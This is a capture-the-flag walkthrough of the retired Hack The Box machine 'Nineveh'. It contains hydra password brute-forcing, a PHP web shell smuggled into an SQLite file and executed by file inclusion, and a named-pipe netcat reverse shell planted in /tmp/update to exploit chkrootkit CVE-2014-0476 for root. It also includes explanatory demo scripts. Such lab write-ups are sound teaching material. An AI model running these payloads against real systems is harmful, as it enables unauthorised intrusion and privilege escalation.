HTB – Nineveh

Today we are going to solve another CTF challenge, "Nineveh". Nineveh is a retired vulnerable lab presented by Hack the Box to help pentesters practise online penetration testing at their own experience level; they have a collection of vulnerable labs as challenges, from beginner to expert level.

Level: Medium

Task: To find user.txt and root.txt

Let's start with a basic nmap scan to find the open ports and running services (the scan below is limited to the three ports of interest; a full -p- sweep is the usual first step):

root@kali:~/htb/nineveh# nmap -p 22,80,443 10.10.10.43
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-11 09:25 EST
Nmap scan report for 10.10.10.43
Host is up (0.029s latency).

PORT STATE SERVICE
22/tcp filtered ssh
80/tcp open http
443/tcp open https
Nmap done: 1 IP address (1 host up) scanned in 17.96 seconds

Ports 80 and 443 are open, and 22 is filtered: SSH is there, but something in front of it is dropping our packets. That is worth remembering for later.

We don't get much from these two static pages, so let's throw DirBuster at port 80 first:
DirBuster 1.0-RC1 — Report
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
Report produced on Wed Oct 18 01:44:50 EDT 2017
 — — — — — — — — — — — — — — — — 
http://10.10.10.43:80
 — — — — — — — — — — — — — — — — 
Directories found during testing:
Dirs found with a 200 response:
/
/department/
/department/css/
/department/files/
Dirs found with a 403 response:
/icons/
/icons/small/
/server-status/

 — — — — — — — — — — — — — — — — 
Files found during testing:
Files found with a 200 responce:
/info.php
/department/login.php
/department/index.php
/department/header.php
/department/footer.php
/department/css/index.php
/department/files/index.php
Files found with a 302 responce:
/department/logout.php
/department/manage.php
— — — — — — — — — — — — — — — —

The /department/ directory, which itself contains /files/, looks interesting, so let's take a look at it:

Cool, we have a web login. Trying typical logins, we notice that the site returns a different message for an unknown username than for a wrong password: submitting the username 'admin' gives 'Invalid Password!', so that account exists. That is classic username enumeration. With the username confirmed, let's use hydra and rockyou.txt to brute-force the password, telling it that any response still containing 'Invalid Password!' is a failed attempt. Check that string with one manual request first: hydra treats any response without it as a success, so a lockout or error page would show up as a false positive.

root@kali:~/Downloads# hydra 10.10.10.43 -l admin -P /usr/share/wordlists/rockyou.txt http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid Password!" -V
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-12-11 13:37:01
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.10.43:80//department/login.php:username=^USER^&password=^PASS^:Invalid Password!
[ATTEMPT] target 10.10.10.43 - login "admin" - pass "123456" - 1 of 14344399 [child 0] (0/0)
--snip--
[ATTEMPT] target 10.10.10.43 - login "admin" - pass "cobain" - 4625 of 14344399 [child 13] (0/0)
[80][http-post-form] host: 10.10.10.43   login: admin   password: 1q2w3e4r5t
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-12-11 13:41:39


Cool, we have a password. Let's log in.
Once logged in, notice that the notes page, manage.php, takes a notes= parameter in the URL naming a file to read. That may come in handy later on, so keep it in mind. Since there is not much else to look at here, let's run DirBuster against port 443 as well:
DirBuster 1.0-RC1 — Report
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
Report produced on Thu Oct 19 12:26:15 EDT 2017
— — — — — — — — — — — — — — — —
https://10.10.10.43:443
— — — — — — — — — — — — — — — — 
Directories found during testing:
Dirs found with a 200 response:
/
/db/
Dirs found with a 403 response:
/icons/
/icons/small/
— — — — — — — — — — — — — — — — 
Files found during testing:
Files found with a 200 responce:
/db/index.php
— — — — — — — — — — — — — — — —

Navigating to /db/ we get a phpLiteAdmin login:

This form only asks for a password, so, staying with hydra, let's fire it up once more. The -l value is a placeholder because the form has no username field, and https-post-form with -s 443 targets the TLS port:

root@kali:~/Downloads# hydra 10.10.10.43 -l whatever -P /usr/share/wordlists/rockyou.txt https-post-form "/db/:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password." -V -s 443
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-12-11 13:50:01
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-forms://10.10.10.43:443//db/:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password.
[ATTEMPT] target 10.10.10.43 - login "whatever" - pass "123456" - 1 of 14344399 [child 0] (0/0)
--snip--
[ATTEMPT] target 10.10.10.43 - login "whatever" - pass "tequieromucho" - 1403 of 14344399 [child 8] (0/0)
[443][http-post-form] host: 10.10.10.43   login: whatever   password: password123
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-12-11 13:55:11

Cool, now we have a login for phpLiteAdmin too! Logging in we get the usual database-admin interface, where we can create new databases and tables. phpLiteAdmin stores each database as an SQLite file on disk, and manage.php on port 80 reads a file whose name we control, so let's create a new database called ninevehNotes.php, mirroring the ninevehNotes.txt that the notes page reads. Create the database, add one table, and put a simple PHP web shell into it (not a reverse shell: it runs whatever command we pass in a request parameter). The raw database file then contains the tag verbatim, and PHP executes it when the file is included:

<?php echo system($_REQUEST['puck']); ?>

Then, via Burp (or just the browser), include the database file through the notes parameter and pass the command in puck:

http://10.10.10.43/department/manage.php?notes=/var/tmp/ninevehNotes.php&puck=ls

With a netcat listener running on my machine, sending a reverse shell through the same parameter (bash piped to my IP) gives me a shell as www-data:

Taking a look around, the first thing I check is the root of the filesystem, where there is a directory called /report. Inside are text files containing output from chkrootkit, a well-known rootkit checker. A new file appears every minute, so something runs it on a schedule. To see which cron job that is, use cronmonit.sh from ippsec, which snapshots the process tree every second and prints only what changed:

www-data@nineveh:/tmp$ cat cronmonit.sh
#!/bin/bash
# Snapshot the process tree once a second and print only the lines that
# appeared (>) or vanished (<) since the previous snapshot, so short-lived
# cron jobs become visible. The monitor's own ps, sleep and script name are
# filtered out of each snapshot.

# Loop by line
IFS=$'\n'

old_process=$(ps aux --forest | grep -v "ps aux --forest" | grep -v "sleep 1" | grep -v "$0")

while true; do
    new_process=$(ps aux --forest | grep -v "ps aux --forest" | grep -v "sleep 1" | grep -v "$0")
    # quoted so the shell cannot glob-expand the pattern
    diff <(echo "$old_process") <(echo "$new_process") | grep '[<>]'
    sleep 1
    old_process=$new_process
done

www-data@nineveh:/tmp$ ./cronmonit.sh
./cronmonit.sh


< root 1293 0.9 0.2 8756 2224 ? Ss Dec09 19:11 /usr/sbin/knockd -d -i ens33
> root 1293 0.9 0.2 8756 2224 ? Ss Dec09 19:12 /usr/sbin/knockd -d -i ens33
< root 1092 0.3 0.5 645344 5592 ? Ssl Dec09 8:13 /usr/bin/lxcfs /var/lib/lxcfs/
> root 1092 0.3 0.5 645344 5592 ? Ssl Dec09 8:14 /usr/bin/lxcfs /var/lib/lxcfs/
< root 10650 0.0 0.0 4512 712 ? Ss 07:09 0:00 \_ /bin/sh -c /root/vulnScan.sh
< root 10652 0.0 0.3 12516 3068 ? S 07:09 0:00 \_ /bin/bash /root/vulnScan.sh
< root 10654 0.0 0.2 4796 2160 ? S 07:09 0:00 \_ /bin/sh /usr/bin/chkrootkit
< root 11625 0.0 0.0 4512 704 ? S 07:09 0:00 \_ /bin/sh /tmp/update
< root 11628 0.0 0.0 7452 672 ? S 07:09 0:00 \_ cat /tmp/2
< root 11629 0.0 0.1 4512 1684 ? S 07:09 0:00 \_ /bin/sh -i
< root 11630 0.0 0.1 11308 1740 ? S 07:09 0:00 \_ nc 10.10.14.19 9876

The diff shows root's cron running /root/vulnScan.sh, which calls chkrootkit (the capture above was taken after planting the payload described below, which is why /tmp/update and the netcat connection already appear under it). Using searchsploit, we learn that chkrootkit before 0.50 (CVE-2014-0476) executes /tmp/update as root if that file exists when the scan runs: an unquoted shell variable in its slapper() check turns the path into a command.

Cool, so the next thing to do is create /tmp/update so that it throws back a reverse shell, which chkrootkit will run as root on its next scheduled run. Dipping into the reverse shell cheat sheet again, we can use a bash backdoor (write it to /tmp/update and make sure the file is executable):

#!/bin/bash
# named-pipe reverse shell: nc feeds our input into /bin/sh and the shell's output back to us
rm -f /tmp/2;mkfifo /tmp/2;cat /tmp/2|/bin/sh -i 2>&1|nc 10.10.14.19 9876 >/tmp/2

Write this into the update file, start another netcat listener on my local machine, wait for the next run of the cron job, and catch the root shell:

root@kali:~/htb/nineveh# nc -lvp 9876
listening on [any] 9876 ...
10.10.10.43: inverse host lookup failed: Unknown host
connect to [10.10.14.19] from (UNKNOWN) [10.10.10.43] 40794
/bin/sh: 0: can't access tty; job control turned off
# ls
root.txt
vulnScan.sh
# whoami
root
# cat root.txt
8a2*****ec3a
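The bug chkrootkit has here is worth seeing in isolation, because the same mistake appears in plenty of other shell scripts that run from root's cron. The script below is an added example written for this writeup, not chkrootkit's own code and not part of the original post: it re-creates the slapper() loop's unquoted assignment in a scratch directory (an assumption standing in for /tmp, so the real /tmp is never touched) next to the one-character fix, plants a harmless marker-writing file named update, and shows that the vulnerable loop executes it while the quoted version only records its path.

```shell
#!/bin/sh
# Added example for this writeup, not chkrootkit's own code: a stripped-down
# re-creation of the bug class behind CVE-2014-0476 (chkrootkit before 0.50).
# slapper() loops over suspicious paths and accumulates hits with an unquoted
# assignment. In sh, "name=$empty /tmp/update" is not an assignment at all: it
# runs /tmp/update with name="" in its environment. Because chkrootkit runs
# from root's cron, root executes whatever a local user dropped at /tmp/update.
# Assumption: $1 is a scratch directory standing in for /tmp.

# Vulnerable form (mirrors the unquoted line in slapper()).
slapper_vulnerable() {
    dir=$1
    file_port=
    for i in "$dir/update" "$dir/httpd" "$dir/.bugtraq"; do
        if [ -f "$i" ]; then
            file_port=$file_port $i      # executes $i when $file_port is empty
        fi
    done
    printf '%s\n' "$file_port"
}

# Hardened form: quoting makes this a single assignment, never a command.
slapper_fixed() {
    dir=$1
    file_port=
    for i in "$dir/update" "$dir/httpd" "$dir/.bugtraq"; do
        if [ -f "$i" ]; then
            file_port="$file_port $i"
        fi
    done
    printf '%s\n' "$file_port"
}

# plant_marker_payload <dir>: writes a harmless "payload" named update that
# only creates <dir>/executed when run, so we can observe whether the check
# executed it. A real attacker puts a reverse shell here, as in the writeup.
plant_marker_payload() {
    printf '#!/bin/sh\ntouch "%s/executed"\n' "$1" > "$1/update"
    chmod +x "$1/update"
}

# payload_ran <dir>: exit 0 if the marker exists, 1 otherwise.
payload_ran() {
    [ -e "$1/executed" ]
}

# Demo: run both variants against a constructed scratch directory.
demo() {
    d=$(mktemp -d)
    plant_marker_payload "$d"
    slapper_vulnerable "$d" >/dev/null
    if payload_ran "$d"; then echo "vulnerable loop: payload executed"; fi
    rm -f "$d/executed"
    slapper_fixed "$d" >/dev/null
    if payload_ran "$d"; then
        echo "fixed loop: payload executed"
    else
        echo "fixed loop: payload not executed, path only recorded"
    fi
    rm -rf "$d"
}

demo
```

The same pattern is easy to catch mechanically: shellcheck flags an unquoted `var=$a $b` as a command with a prefix assignment, which is exactly the warning that would have caught this line.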

Alternative route to user.txt

While enumerating further I found /etc/knockd.conf, which explains the filtered SSH port: knockd only opens it after a specific sequence of connection attempts:

[openSSH]
 sequence = 571,290,911

I also found https://10.10.10.43/secure_notes/, with a photo named nineveh.png. binwalk shows that it is more than an image: a tar archive is appended after the PNG data (at byte offset 2881744), and it contains an SSH key pair.

root@kali:~/htb/nineveh# binwalk nineveh.png

DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PNG image, 1497 x 746, 8-bit/color RGB, non-interlaced
84 0x54 Zlib compressed data, best compression
2881744 0x2BF8D0 POSIX tar archive (GNU)

root@kali:~/htb/nineveh# binwalk -Me nineveh.png

Scan Time: 2018-12-11 08:38:32
Target File: /root/htb/nineveh/nineveh.png
MD5 Checksum: 353b8f5a4578e4472c686b6e1f15c808
Signatures: 386

DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PNG image, 1497 x 746, 8-bit/color RGB, non-interlaced
84 0x54 Zlib compressed data, best compression
2881744 0x2BF8D0 POSIX tar archive (GNU)


Scan Time: 2018-12-11 08:38:34
Target File: /root/htb/nineveh/_nineveh.png.extracted/54
MD5 Checksum: d41d8cd98f00b204e9800998ecf8427e
Signatures: 386

DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------


Scan Time: 2018-12-11 08:38:34
Target File: /root/htb/nineveh/_nineveh.png.extracted/secret/nineveh.priv
MD5 Checksum: f426d661f94b16292efc810ebb7ea305
Signatures: 386

DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PEM RSA private key


Scan Time: 2018-12-11 08:38:34
Target File: /root/htb/nineveh/_nineveh.png.extracted/secret/nineveh.pub
MD5 Checksum: 6b60618d207ad97e76664174e805cfda
Signatures: 386

DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 OpenSSH RSA public key

root@kali:~/htb/nineveh/_nineveh.png.extracted/secret# cat nineveh.priv
-----BEGIN RSA PRIVATE KEY-----
(key body omitted)
-----END RSA PRIVATE KEY-----
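binwalk -e did the extraction here, but it is worth being able to do it by hand, both to confirm what the extractor pulled out and for the case where binwalk has no extractor for the embedded format. The script below is an added example for this writeup, not binwalk's or the box's own code: given the decimal offset binwalk reports (2881744 for nineveh.png), it lists and extracts the appended tar with tail and tar, and find_tar_offset recovers that offset without binwalk by locating the ustar magic. The image and key file built in demo() are constructed stand-ins (a run of zero bytes plus a dummy text file), not the real nineveh.png.

```shell
#!/bin/sh
# Added example for this writeup, not binwalk's or the box's own code: carve an
# archive appended to an image by hand, using the decimal byte offset binwalk
# prints (2881744 for nineveh.png). The files built in demo() are constructed
# stand-ins, not the real nineveh.png.

# find_tar_offset <file>: offset of the first tar header. The "ustar" magic
# lives 257 bytes into a header, so subtract 257 from the first match.
# Caveat: the string could also occur inside image data; cross-check with
# list_tar before trusting the value.
find_tar_offset() {
    pos=$(grep -oba 'ustar' "$1" | head -n 1 | cut -d: -f1)
    [ -n "$pos" ] || return 1
    echo $((pos - 257))
}

# list_tar <file> <offset>: list archive members without extracting.
# tail -c +N is 1-based while binwalk's offset is 0-based, hence the +1.
list_tar() {
    tail -c "+$(( $2 + 1 ))" "$1" | tar -tf -
}

# carve_tar <file> <offset> <outdir>: extract the members into <outdir>.
# tar stops at the end-of-archive blocks, so trailing data is harmless.
carve_tar() {
    mkdir -p "$3"
    tail -c "+$(( $2 + 1 ))" "$1" | tar -xf - -C "$3"
}

# demo: build a fake "image" (4096 zero bytes) with a tar appended, then
# recover the offset, list the archive and extract it.
demo() {
    w=$(mktemp -d)
    mkdir -p "$w/src/secret"
    echo 'dummy content, not a real key' > "$w/src/secret/nineveh.priv"
    head -c 4096 /dev/zero > "$w/image.png"
    tar -cf - -C "$w/src" secret >> "$w/image.png"
    off=$(find_tar_offset "$w/image.png")
    echo "tar archive at decimal offset $off"
    list_tar "$w/image.png" "$off"
    carve_tar "$w/image.png" "$off" "$w/out"
    cat "$w/out/secret/nineveh.priv"
    rm -rf "$w"
}

demo
```

Against the real file the call is simply carve_tar nineveh.png 2881744 extracted, and list_tar first is the sanity check that the offset really lands on a header.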


Knocking on the three ports in order opens SSH (if knock is not installed, anything that sends a TCP SYN to each port in sequence, such as nc -z, does the same), as a rescan confirms:

root@kali:~/htb/nineveh# knock 10.10.10.43 571:tcp 290:tcp 911:tcp
root@kali:~/htb/nineveh# nmap -p 22,80,443 10.10.10.43
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-11 09:28 EST
Nmap scan report for 10.10.10.43
Host is up (0.025s latency).

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https

With port 22 open, the extracted key logs in as amrois over SSH, which gives user.txt without going through the web shell at all:

root@kali:~/htb/nineveh/_nineveh.png.extracted/secret# ssh -i nineveh.priv amrois@10.10.10.43

Author: Jacco Straathof
